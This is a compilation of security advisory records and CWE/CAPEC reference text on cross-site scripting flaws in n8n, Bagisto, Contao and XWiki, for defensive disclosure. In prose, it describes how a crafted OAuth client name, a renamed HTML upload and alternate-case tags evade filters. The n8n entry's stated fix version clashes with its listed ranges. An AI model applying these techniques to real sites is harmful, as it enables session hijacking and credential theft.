"url": "https://github.com/xwiki/xwiki-platform/commit/8f5a889b7cd140770e54f5b4195d88058790e305"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20583"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20614"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "XWiki Platform vulnerable to reflected cross-site scripting via xredirect parameter in DeleteApplication page"
}
GHSA-537J-GQPC-P7FQ
Vulnerability from github – Published: 2026-04-29 21:23 – Updated: 2026-05-08 01:31Impact
An unauthenticated attacker could register a malicious MCP OAuth client with a crafted client_name. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim's authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation.
Patches
This issue has been fixed in n8n version 2.14.2. Users should upgrade to this version or later to remediate the vulnerability.
Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations: - Restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only. - Disable MCP server functionality if it is not actively required.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.123.32"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "2.18.0"
},
{
"fixed": "2.18.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "2.17.0"
},
{
"fixed": "2.17.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42235"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T21:23:04Z",
"nvd_published_at": "2026-05-04T19:16:06Z",
"severity": "HIGH"
},
"details": "## Impact\nAn unauthenticated attacker could register a malicious MCP OAuth client with a crafted `client_name`. If a victim user authorized the OAuth consent dialog and a second user subsequently revoked that access, a toast notification would render the injected script. Clicking the link would execute arbitrary JavaScript in the victim\u0027s authenticated n8n browser session, enabling credential and session token theft, workflow manipulation, or privilege escalation.\n\n## Patches\nThis issue has been fixed in n8n version 2.14.2. Users should upgrade to this version or later to remediate the vulnerability.\n\n## Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n- Restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only.\n- Disable MCP server functionality if it is not actively required.\n\nThese workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.",
"id": "GHSA-537j-gqpc-p7fq",
"modified": "2026-05-08T01:31:29Z",
"published": "2026-04-29T21:23:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-537j-gqpc-p7fq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42235"
},
{
"type": "PACKAGE",
"url": "https://github.com/n8n-io/n8n"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L",
"type": "CVSS_V4"
}
],
"summary": "n8n Vulnerable to XSS via MCP OAuth client"
}
GHSA-67PX-R26W-598X
Vulnerability from github – Published: 2025-10-16 18:12 – Updated: 2025-10-16 21:54Summary
In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser.
Details
The application blocks the uploading of HTML files; however, if the backend detected that the content of the .png file is HTML or JavaScript, the file extension will be automatically converted from .png to .html. When the HTML is viewed, it will execute the JavaScript code.
PoC
Created a html file, renamed the extension to .png, and uploaded the file. It was converted to HTML file in the backend. When opened in another tab, the JavaScript code will execute.
Impact
A aalicious script is stored in HTML file and executed when the content is viewed. An attacker (with upload privilege) can target other admin users or editors who view the content, enabling session hijacking, unauthorized actions, or privilege escalation.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.3.7"
},
"package": {
"ecosystem": "Packagist",
"name": "bagisto/bagisto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62415"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-80",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-16T18:12:10Z",
"nvd_published_at": "2025-10-16T19:15:34Z",
"severity": "MODERATE"
},
"details": "### Summary\nIn Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted HTML file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user\u2019s browser.\n\n### Details\nThe application blocks the uploading of HTML files; however, if the backend detected that the content of the .png file is HTML or JavaScript, the file extension will be automatically converted from .png to .html. When the HTML is viewed, it will execute the JavaScript code.\n\n### PoC\nCreated a html file, renamed the extension to .png, and uploaded the file. It was converted to HTML file in the backend. When opened in another tab, the JavaScript code will execute.\n\u003cimg width=\"1605\" height=\"702\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd9406aa-2380-464f-ac21-32d483639969\" /\u003e\n\u003cimg width=\"1358\" height=\"314\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e5a64a5a-39fb-4fdb-ada9-14c4b9554803\" /\u003e\n\n### Impact\nA aalicious script is stored in HTML file and executed when the content is viewed. An attacker (with upload privilege) can target other admin users or editors who view the content, enabling session hijacking, unauthorized actions, or privilege escalation.",
"id": "GHSA-67px-r26w-598x",
"modified": "2025-10-16T21:54:25Z",
"published": "2025-10-16T18:12:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-67px-r26w-598x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62415"
},
{
"type": "WEB",
"url": "https://github.com/bagisto/bagisto/commit/7b6b1dd639a14e7053bb82ef2f971c1f533fdfab"
},
{
"type": "PACKAGE",
"url": "https://github.com/bagisto/bagisto"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "bagisto has Cross Site Scripting (XSS) issue in TinyMCE Image Upload (HTML)"
}
GHSA-68Q5-78XP-CWWC
Vulnerability from github – Published: 2025-11-25 20:48 – Updated: 2025-11-27 08:59Impact
It is possible to inject code into the template output that will be executed in the browser in the front end and back end.
Patches
Update to Contao 4.13.57, 5.3.42 or 5.6.5.
Workarounds
Do not use the affected templates or patch them manually.
Refsources
https://contao.org/en/security-advisories/cross-site-scripting-in-templates
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "contao/core-bundle"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.13.57"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "contao/core-bundle"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0-RC1"
},
{
"fixed": "5.3.42"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "contao/core-bundle"
},
"ranges": [
{
"events": [
{
"introduced": "5.4.0-RC1"
},
{
"fixed": "5.6.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-65961"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-25T20:48:13Z",
"nvd_published_at": "2025-11-25T19:15:51Z",
"severity": "LOW"
},
"details": "### Impact\n\nIt is possible to inject code into the template output that will be executed in the browser in the front end and back end.\n\n### Patches\n\nUpdate to Contao 4.13.57, 5.3.42 or 5.6.5.\n\n### Workarounds\n\nDo not use the affected templates or patch them manually.\n\n### Refsources\n\nhttps://contao.org/en/security-advisories/cross-site-scripting-in-templates",
"id": "GHSA-68q5-78xp-cwwc",
"modified": "2025-11-27T08:59:34Z",
"published": "2025-11-25T20:48:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/contao/contao/security/advisories/GHSA-68q5-78xp-cwwc"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65961"
},
{
"type": "WEB",
"url": "https://contao.org/en/security-advisories/cross-site-scripting-in-templates"
},
{
"type": "PACKAGE",
"url": "https://github.com/contao/contao"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Contao is vulnerable to cross-site scripting in templates"
}
Mitigation
Resolve all input to absolute or canonical representations before processing.
Mitigation
Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
Mitigation MIT-30.1
Strategy: Output Encoding
- Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
- The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
With Struts, write all data from form beans with the bean's filter attribute set to true.
Mitigation MIT-31
Strategy: Attack Surface Reduction
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
CAPEC-199: XSS Using Alternate Syntax
An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.